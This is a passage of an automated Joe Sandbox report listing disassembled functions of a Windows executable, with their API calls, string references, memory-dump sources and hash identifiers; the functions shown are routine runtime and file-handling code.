              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: bf4e03aee22c7983e286e0cd740ba3bdf68e8303af5dfb0b0dd5457cd7787b72
              • Instruction ID: 239a2a3eeb19ac63953613a7343062433008bacf6910a8e7c59a1e3d22c9d924
              • Opcode Fuzzy Hash: bf4e03aee22c7983e286e0cd740ba3bdf68e8303af5dfb0b0dd5457cd7787b72
              • Instruction Fuzzy Hash: 87012D63904311BACB30BB799C82CABB7ECEEB6760B504496F855C60A1FB30D940C3A1
              Function 00B906BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
              Download Yara Rule
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B906F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B906FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B8ABC5,00000008,?,00000000,?,00B8CB88,?,00000000), ref: 00B9070D
              Strings
              • Thread pool initialization failed., xrefs: 00B90725
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: 3dadbc769d3507bc5236ef86b9eaf593f979b3068f997d21748de876a0169c4a
              • Instruction ID: 7c4707c6a8bde1bbfd293ab18f338d0444e01a9092a99c033033fb449c13df36
              • Opcode Fuzzy Hash: 3dadbc769d3507bc5236ef86b9eaf593f979b3068f997d21748de876a0169c4a
              • Instruction Fuzzy Hash: 9B1170B1504708AFC7216F65DC84AA7FBECEF95755F10496EF1DA83200DBB16981CB60
              Function 00B9D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: f4068608e1aa9d1b4df4df08447f0096c6ffea58f1821ccb8ab634b69d28acf1
              • Instruction ID: f8ab4ff0df4117f0741290e9a46945bd31bbbe351f833d01456faf1b14252d39
              • Opcode Fuzzy Hash: f4068608e1aa9d1b4df4df08447f0096c6ffea58f1821ccb8ab634b69d28acf1
              • Instruction Fuzzy Hash: B901B172A14245AFCF119F69ED84EA67FE9F718381B044472F80993331DEB19850EBA1
              Function 00BA91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction ID: 5ef8b4ed7990ff9ca954e649a50806dbcd6a9797dc06803355044afbe1916cb2
              • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction Fuzzy Hash: 9DA17731908386AFEF21CF68C8917AEBBE5EF57310F1441EDE4959B381C6388942D754
              Function 00B8A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00B880B7,?,?,?), ref: 00B8A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00B880B7,?,?), ref: 00B8A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00B880B7,?,?,?,?,?,?,?,?), ref: 00B8A416
              • CloseHandle.KERNEL32(?,?,00000000,?,00B880B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00B8A41D
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: 43682eb2b23e4e17772c9c4018110ceab9bbddb88761a6d77f38aa9c75cfc415
              • Instruction ID: efa40753db8374f0e0335083373505df4a7a791a1660c1a5dc24564b3a0b89b2
              • Opcode Fuzzy Hash: 43682eb2b23e4e17772c9c4018110ceab9bbddb88761a6d77f38aa9c75cfc415
              • Instruction Fuzzy Hash: 5641D0302483806AE731FF24DC45FAEBBE8AF81700F18099EB5D0931A1D6649A48DB13
              Function 00BAC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BA89AD,?,00000000,?,00000001,?,?,00000001,00BA89AD,?), ref: 00BAC0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BAC16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BA67E2,?), ref: 00BAC181
              • __freea.LIBCMT ref: 00BAC18A
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 96dead7eb8003eabb76cd6059d4d6625a7bb7bd30eb8b44ac5d32e7194412346
              • Instruction ID: bb431287b984ff8cc4107023c8cd26c5963ea6828e7e4d305397b2f918cfff2b
              • Opcode Fuzzy Hash: 96dead7eb8003eabb76cd6059d4d6625a7bb7bd30eb8b44ac5d32e7194412346
              • Instruction Fuzzy Hash: 1B31D072A0420AABDF258F64DC81DEE7BE5EB41710F0402A9FC05E7251EB35CD50CBA0
              Function 00BA2503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00BA251A
                • Part of subcall function 00BA2B52: ___AdjustPointer.LIBCMT ref: 00BA2B9C
              • _UnwindNestedFrames.LIBCMT ref: 00BA2531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00BA2543
              • CallCatchBlock.LIBVCRUNTIME ref: 00BA2567
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction ID: 463461579aa112cddb2eefb4195d374a755f0e82120f8ba4ca47cce538108321
              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction Fuzzy Hash: CF011732404109BBCF129F59CC41EDA3BFAFF5A710F0584A4FD1866120C336E961EBA1
              Function 00B99DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • GetDC.USER32(00000000), ref: 00B99DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B99DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B99DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00B99DE9
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: a3023851a8ac1ba80a12444222c0bf03a00cc51cb468911db193542bbe6d2869
              • Instruction ID: edbde98880d29db603e9a6e8d3202b056a46e4b154e351f41ce84d565711a6a0
              • Opcode Fuzzy Hash: a3023851a8ac1ba80a12444222c0bf03a00cc51cb468911db193542bbe6d2869
              • Instruction Fuzzy Hash: 28E0EC31985661A7D7641BA4AC4DF8B3F58AB0D723F050015F6059F2D1DEB04405DB90
              Function 00BA2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
              Download Yara Rule
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BA2016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BA201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BA2020
                • Part of subcall function 00BA310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BA311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BA2035
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction ID: f6cd845c8be8e22240a8db96172df7c1fb8c526d269e7992f8bb39534c1b560c
              • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
              • Instruction Fuzzy Hash: EFC0482400C640E41C723BBA72032BD0BC04C63FC4B9320C2FA8027203DE060A0FA23A
              Function 00B99F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B99DF1: GetDC.USER32(00000000), ref: 00B99DF5
                • Part of subcall function 00B99DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B99E00
                • Part of subcall function 00B99DF1: ReleaseDC.USER32(00000000,00000000), ref: 00B99E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00B99F8D
                • Part of subcall function 00B9A1E5: GetDC.USER32(00000000), ref: 00B9A1EE
                • Part of subcall function 00B9A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00B9A21D
                • Part of subcall function 00B9A1E5: ReleaseDC.USER32(00000000,?), ref: 00B9A2B5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: 2c2c1a55c9a76cada202ad4bd94ab2a3928e740be2cc07b518e096f7261f6eef
              • Instruction ID: 38e5835bbaa7be5aa3ca707ed5b3c5d634e576d425049bd6138f951237a29b8d
              • Opcode Fuzzy Hash: 2c2c1a55c9a76cada202ad4bd94ab2a3928e740be2cc07b518e096f7261f6eef
              • Instruction Fuzzy Hash: 478105716082549FCB14DF68D884A2ABBE9FF89704F00496DF98AD7260DB71ED05CB62
              Function 00B90E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: 5c30108c64bd1b23e782aec6ff7ce8ae4c9ae5655b5b79ad5252c9838875fe47
              • Instruction ID: 4f3db0484774bc8f0444adbdce6df85afe0c3f631fdcf9356c1109c8a10d22e7
              • Opcode Fuzzy Hash: 5c30108c64bd1b23e782aec6ff7ce8ae4c9ae5655b5b79ad5252c9838875fe47
              • Instruction Fuzzy Hash: 8551D63169CB01FEFE213AA8CD92F3676D5EB04B00F214DF7B39A648E2C6925550B712
              Function 00BAA918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00BAAA84
                • Part of subcall function 00BA8849: IsProcessorFeaturePresent.KERNEL32(00000017,00BA8838,00000050,00BB3958,?,00B8CFE0,00000004,00BC0EE8,?,?,00BA8845,00000000,00000000,00000000,00000000,00000000), ref: 00BA884B
                • Part of subcall function 00BA8849: GetCurrentProcess.KERNEL32(C0000417,00BB3958,00000050,00BC0EE8), ref: 00BA886D
                • Part of subcall function 00BA8849: TerminateProcess.KERNEL32(00000000), ref: 00BA8874
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
              • String ID: *?$.
              • API String ID: 2667617558-3972193922
              • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
              • Instruction ID: 076fd9184c3ca5eb63e546108620f90ce23a517a74f69e35485efe229f5ac0c8
              • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
              • Instruction Fuzzy Hash: 1D519071E0420AAFDF14DFA8C881AAEB7F5EF59310F2581AAE454E7340E7359E01CB61
              Function 00B8772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B87730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B878CC
                • Part of subcall function 00B8A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A458
                • Part of subcall function 00B8A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A27A,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A489
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: 45088726f87d5bfd280ec2cc175808c8e8542017354b365c38bef427ae932ecd
              • Instruction ID: c080f6a93102c27f8b68198dabfb2cc81e222b974a28eb5e233f18b598f556db
              • Opcode Fuzzy Hash: 45088726f87d5bfd280ec2cc175808c8e8542017354b365c38bef427ae932ecd
              • Instruction Fuzzy Hash: 4E415171845158AAEB21FB50CD55EEEB3FCEF44704F1040DAB609A21A2EF749F84DB61
              Function 00B8B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: f54d13c31c8d13a8c2c83f3f57ce5057d586a1d594e236a86a042f836a8c37e0
              • Instruction ID: 4f3b87bbcb6556f7f27c7380a934be289be1946f99d2fef414f3c208c15d3133
              • Opcode Fuzzy Hash: f54d13c31c8d13a8c2c83f3f57ce5057d586a1d594e236a86a042f836a8c37e0
              • Instruction Fuzzy Hash: 6A416C3984021AAACF20BE31DC81EEB77E9EF45750B1040E5F814A7272E770DE40CB65
              Function 00B98FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 5fb3f1ecc15099d8955f4dbb6b98993e9cba478ee18fab2102d148d2ec329082
              • Instruction ID: 46f076e8408a48828f7ed9f83550a97e4fbfce5a7182f2f70a3300e46af5d76f
              • Opcode Fuzzy Hash: 5fb3f1ecc15099d8955f4dbb6b98993e9cba478ee18fab2102d148d2ec329082
              • Instruction Fuzzy Hash: 75217C712043049FDF489F69C895A6A77E9FF89711B1485BDF8198B292DFB0EC00CB61
              Function 00B8EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8EB92
                • Part of subcall function 00B8EB73: GetProcAddress.KERNEL32(00BC81C0,CryptUnprotectMemory), ref: 00B8EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,00B8EBEC), ref: 00B8EC84
              Strings
              • CryptUnprotectMemory failed, xrefs: 00B8EC7C
              • CryptProtectMemory failed, xrefs: 00B8EC3B
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 283c541c70e91a63a2892426cd8312a48d2e11d5149eed95af185e1003cc4aad
              • Instruction ID: 8501c6e9f70781c062bb8981001dc42f9dbd3323649f5c0872718ba62e9fde49
              • Opcode Fuzzy Hash: 283c541c70e91a63a2892426cd8312a48d2e11d5149eed95af185e1003cc4aad
              • Instruction Fuzzy Hash: FA113632E04224ABDB147B25DC06B6E37D4EF08B20B044199FC516B2A1CB71DE41CBD0
              Function 00B90889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
